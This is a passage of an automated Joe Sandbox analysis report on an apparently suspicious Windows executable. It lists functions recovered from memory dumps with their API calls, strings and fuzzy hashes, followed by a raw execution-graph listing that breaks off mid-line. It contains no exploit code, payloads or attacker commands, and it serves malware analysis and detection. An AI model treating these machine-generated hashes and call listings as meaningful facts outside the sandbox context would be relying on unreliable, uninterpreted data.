                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Version
                                                                              • String ID:
                                                                              • API String ID: 1889659487-0
                                                                              • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                              • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                                              • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                              • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                              • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                              • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                              • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressCloseHandleModuleProc
                                                                              • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                              • API String ID: 4190037839-2401316094
                                                                              • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                              • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                              • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                              • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                              • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                              • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                              • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                              • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                              • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                              • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                              • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                              • String ID:
                                                                              • API String ID: 1694776339-0
                                                                              • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                              • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                              • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                              • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                              APIs
                                                                              • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                                • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale$DefaultSystem
                                                                              • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                              • API String ID: 1044490935-665933166
                                                                              • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                              • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                                              • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                              • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                                              APIs
                                                                              • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                              • LocalFree.KERNEL32(0061FC50,00000000,00401AB4), ref: 00401A1B
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,0061FC50,00000000,00401AB4), ref: 00401A3A
                                                                              • LocalFree.KERNEL32(0061ED00,?,00000000,00008000,0061FC50,00000000,00401AB4), ref: 00401A79
                                                                              • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                              • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                              • String ID:
                                                                              • API String ID: 3782394904-0
                                                                              • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                              • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                              • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                              • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                              APIs
                                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                              • ExitProcess.KERNEL32 ref: 00403DE5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ExitMessageProcess
                                                                              • String ID: Error$Runtime error at 00000000$9@
                                                                              • API String ID: 1220098344-1503883590
                                                                              • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                              • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                              • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                              • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                              • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                              • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$AllocString
                                                                              • String ID:
                                                                              • API String ID: 262959230-0
                                                                              • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                              • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                              • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                              • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                              • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CommandHandleLineModule
                                                                              • String ID: U1hd.@$%`
                                                                              • API String ID: 2123368496-935274462
                                                                              • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                              • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                              • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                              • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                              APIs
                                                                              • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                              • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                              • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                              • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                              • String ID:
                                                                              • API String ID: 730355536-0
                                                                              • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                              • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                              • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                              • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                              APIs
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue
                                                                              • String ID: )q@
                                                                              • API String ID: 3660427363-2284170586
                                                                              • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                              • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                              • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                              • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                              APIs
                                                                              • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                              • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                              • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                              • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastSleep
                                                                              • String ID:
                                                                              • API String ID: 1458359878-0
                                                                              • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                              • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                              • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                              • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                              Execution Graph

                                                                              Execution Coverage:14.4%
                                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                                              Signature Coverage:4.5%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:91
                                                                              execution_graph 52386 40cf00 52387 40cf12 52386->52387 52388 40cf0d 52386->52388 52390 406f50 CloseHandle 52388->52390 52390->52387 52391 402584 52392 402598 52391->52392 52393 4025ab 52391->52393 52421 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 52392->52421 52395 4025c2 RtlEnterCriticalSection 52393->52395 52396 4025cc 52393->52396 52395->52396 52407 4023b4 13 API calls 52396->52407 52398 40259d 52398->52393 52400 4025a1 52398->52400 52399 4025d5 52401 4025d9 52399->52401 52408 402088 52399->52408 52404 402635 52401->52404 52405 40262b RtlLeaveCriticalSection 52401->52405 52403 4025e5 52403->52401 52422 402210 9 API calls 52403->52422 52405->52404 52407->52399 52409 40209c 52408->52409 52410 4020af 52408->52410 52429 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 52409->52429 52411 4020c6 RtlEnterCriticalSection 52410->52411 52415 4020d0 52410->52415 52411->52415 52413 4020a1 52413->52410 52414 4020a5 52413->52414 52418 402106 52414->52418 52415->52418 52423 401f94 52415->52423 52418->52403 52419 4021f1 RtlLeaveCriticalSection 52420 4021fb 52419->52420 52420->52403 52421->52398 52422->52401 52426 401fa4 52423->52426 52424 401fd0 52428 401ff4 52424->52428 52435 401db4 52424->52435 52426->52424 52426->52428 52430 401f0c 52426->52430 52428->52419 52428->52420 52429->52413 52439 40178c 52430->52439 52434 401f29 52434->52426 52436 401dd2 52435->52436 52437 401e02 52435->52437 52436->52428 52437->52436 52462 401d1c 52437->52462 52442 4017a8 52439->52442 52441 4017b2 52458 401678 VirtualAlloc 52441->52458 52442->52441 52444 40180f 52442->52444 52447 401803 52442->52447 52450 4014e4 52442->52450 52459 4013e0 LocalAlloc 52442->52459 52444->52434 52449 401e80 9 API calls 52444->52449 52446 4017be 52446->52444 52460 4015c0 VirtualFree 52447->52460 52449->52434 52451 4014f3 VirtualAlloc 52450->52451 52453 401520 52451->52453 52454 401543 52451->52454 52461 401398 LocalAlloc 52453->52461 52454->52442 52456 40152c 52456->52454 52457 401530 VirtualFree 52456->52457 52457->52454 52458->52446 52459->52442 52460->52444 52461->52456 52463 401d2e 52462->52463 52464 401d51 52463->52464 52465 401d63 52463->52465 52475 401940 52464->52475 52467 401940 3 API calls 52465->52467 52468 401d61 52467->52468 52469 401d79 52468->52469 52485 401bf8 9 API calls 52468->52485 52469->52436 52471 401d88 52472 401da2 52471->52472 52486 401c4c 9 API calls 52471->52486 52487 401454 LocalAlloc 52472->52487 52476 401966 52475->52476 52477 4019bf 52475->52477 52488 40170c 52476->52488 52477->52468 52481 401983 52482 40199a 52481->52482 52493 4015c0 VirtualFree 52481->52493 52482->52477 52494 401454 LocalAlloc 52482->52494 52485->52471 52486->52472 52487->52469 52490 401743 52488->52490 52489 401783 52492 4013e0 LocalAlloc 52489->52492 52490->52489 52491 40175d VirtualFree 52490->52491 52491->52490 52492->52481 52493->52482 52494->52477 52495 41364c SetWindowLongA GetWindowLongA 52496 4136a9 SetPropA SetPropA 52495->52496 52497 41368b GetWindowLongA 52495->52497 52501 41f3ac 52496->52501 52497->52496 52498 41369a SetWindowLongA 52497->52498 52498->52496 52506 415280 52501->52506 52513 423c1c 52501->52513 52607 423a94 52501->52607 52502 4136f9 52507 41528d 52506->52507 52508 4152f3 52507->52508 52509 4152e8 52507->52509 52512 4152f1 52507->52512 52614 424b9c 13 API calls 52508->52614 52509->52512 52615 41506c 46 API calls 52509->52615 52512->52502 52516 423c52 52513->52516 52532 423c73 52516->52532 52616 423b78 52516->52616 52517 423cfc 52519 423d03 52517->52519 52520 423d37 52517->52520 52518 423c9d 52521 423ca3 52518->52521 52522 423d60 52518->52522 52527 423d09 52519->52527 52565 423fc1 52519->52565 52523 423d42 52520->52523 52524 4240aa IsIconic 52520->52524 52528 423cd5 52521->52528 52529 423ca8 52521->52529 52525 423d72 52522->52525 52526 423d7b 52522->52526 52530 4240e6 52523->52530 52531 423d4b 52523->52531 52524->52532 52536 4240be GetFocus 52524->52536 52533 423d88 52525->52533 52534 423d79 52525->52534 52631 4241a4 11 API calls 52526->52631 52537 423f23 SendMessageA 52527->52537 52538 423d17 52527->52538 52528->52532 52556 423cee 52528->52556 52557 423e4f 52528->52557 52539 423e06 52529->52539 52540 423cae 52529->52540 52664 424860 WinHelpA PostMessageA 52530->52664 52542 4240fd 52531->52542 52566 423cd0 52531->52566 52532->52502 52632 4241ec IsIconic 52533->52632 52640 423b94 NtdllDefWindowProc_A 52534->52640 52536->52532 52544 4240cf 52536->52544 52537->52532 52538->52532 52538->52566 52586 423f66 52538->52586 52644 423b94 NtdllDefWindowProc_A 52539->52644 52545 423cb7 52540->52545 52546 423e2e PostMessageA 52540->52546 52554 424106 52542->52554 52555 42411b 52542->52555 52663 41f004 GetCurrentThreadId 73A25940 52544->52663 52551 423cc0 52545->52551 52552 423eb5 52545->52552 52650 423b94 NtdllDefWindowProc_A 52546->52650 52560 423cc9 52551->52560 52561 423dde IsIconic 52551->52561 52562 423ebe 52552->52562 52563 423eef 52552->52563 52553 423e49 52553->52532 52665 4244e4 52554->52665 52671 42453c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 52555->52671 52556->52566 52567 423e1b 52556->52567 52620 423b94 NtdllDefWindowProc_A 52557->52620 52559 4240d6 52559->52532 52571 4240de SetFocus 52559->52571 52560->52566 52572 423da1 52560->52572 52574 423dfa 52561->52574 52575 423dee 52561->52575 52573 423b24 5 API calls 52562->52573 52627 423b94 NtdllDefWindowProc_A 52563->52627 52565->52532 52581 423fe7 IsWindowEnabled 52565->52581 52566->52532 52630 423b94 NtdllDefWindowProc_A 52566->52630 52645 424188 52567->52645 52570 423e55 52578 423e93 52570->52578 52579 423e71 52570->52579 52571->52532 52572->52532 52641 422c5c ShowWindow PostMessageA PostQuitMessage 52572->52641 52580 423ec6 52573->52580 52643 423b94 NtdllDefWindowProc_A 52574->52643 52642 423bd0 15 API calls 52575->52642 52587 423a94 6 API calls 52578->52587 52621 423b24 52579->52621 52589 423ed8 52580->52589 52651 41ef68 52580->52651 52581->52532 52590 423ff5 52581->52590 52584 423ef5 52591 423f0d 52584->52591 52628 41eeb4 GetCurrentThreadId 73A25940 52584->52628 52586->52532 52595 423f88 IsWindowEnabled 52586->52595 52596 423e9b PostMessageA 52587->52596 52657 423b94 NtdllDefWindowProc_A 52589->52657 52600 423ffc IsWindowVisible 52590->52600 52593 423a94 6 API calls 52591->52593 52593->52532 52595->52532 52599 423f96 52595->52599 52596->52532 52658 412320 7 API calls 52599->52658 52600->52532 52602 42400a GetFocus 52600->52602 52659 4181f0 52602->52659 52604 42401f SetFocus 52661 415250 52604->52661 52608 423b1d 52607->52608 52609 423aa4 52607->52609 52608->52502 52609->52608 52610 423aaa EnumWindows 52609->52610 52610->52608 52611 423ac6 GetWindow GetWindowLongA 52610->52611 52803 423a2c GetWindow 52610->52803 52612 423ae5 52611->52612 52612->52608 52613 423b11 SetWindowPos 52612->52613 52613->52608 52613->52612 52614->52512 52615->52512 52617 423b82 52616->52617 52618 423b8d 52616->52618 52617->52618 52672 408728 GetSystemDefaultLCID 52617->52672 52618->52517 52618->52518 52620->52570 52622 423b72 PostMessageA 52621->52622 52624 423b33 52621->52624 52622->52532 52623 423b6a 52775 40b3d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52623->52775 52624->52622 52624->52623 52626 423b5e SetWindowPos 52624->52626 52626->52623 52626->52624 52627->52584 52629 41ef39 52628->52629 52629->52591 52630->52532 52631->52532 52633 424233 52632->52633 52634 4241fd SetActiveWindow 52632->52634 52633->52532 52776 42365c 52634->52776 52637 423b24 5 API calls 52638 42421a 52637->52638 52638->52633 52639 42422d SetFocus 52638->52639 52639->52633 52640->52532 52641->52532 52642->52532 52643->52532 52644->52532 52788 41db40 52645->52788 52648 4241a0 52648->52532 52649 424194 LoadIconA 52649->52648 52650->52553 52652 41ef70 IsWindow 52651->52652 52653 41ef9c 52651->52653 52654 41ef7f EnableWindow 52652->52654 52656 41ef8a 52652->52656 52653->52589 52654->52656 52655 402660 4 API calls 52655->52656 52656->52652 52656->52653 52656->52655 52657->52532 52658->52532 52660 4181fa 52659->52660 52660->52604 52662 41526b SetFocus 52661->52662 52662->52532 52663->52559 52664->52553 52666 4244f0 52665->52666 52667 42450a 52665->52667 52668 42451f 52666->52668 52669 4244f7 SendMessageA 52666->52669 52670 402648 4 API calls 52667->52670 52668->52532 52669->52668 52670->52668 52671->52553 52727 408570 GetLocaleInfoA 52672->52727 52677 408570 5 API calls 52678 40877d 52677->52678 52679 408570 5 API calls 52678->52679 52680 4087a1 52679->52680 52739 4085bc GetLocaleInfoA 52680->52739 52683 4085bc GetLocaleInfoA 52684 4087d1 52683->52684 52685 408570 5 API calls 52684->52685 52686 4087eb 52685->52686 52687 4085bc GetLocaleInfoA 52686->52687 52688 408808 52687->52688 52689 408570 5 API calls 52688->52689 52690 408822 52689->52690 52691 403450 4 API calls 52690->52691 52692 40882f 52691->52692 52693 408570 5 API calls 52692->52693 52694 408844 52693->52694 52695 403450 4 API calls 52694->52695 52696 408851 52695->52696 52697 4085bc GetLocaleInfoA 52696->52697 52698 40885f 52697->52698 52699 408570 5 API calls 52698->52699 52700 408879 52699->52700 52701 403450 4 API calls 52700->52701 52702 408886 52701->52702 52703 408570 5 API calls 52702->52703 52704 40889b 52703->52704 52728 408597 52727->52728 52729 4085a9 52727->52729 52755 4034e0 52728->52755 52731 403494 4 API calls 52729->52731 52732 4085a7 52731->52732 52733 403450 52732->52733 52734 403454 52733->52734 52736 403464 52733->52736 52734->52736 52737 4034bc 4 API calls 52734->52737 52735 403490 52735->52677 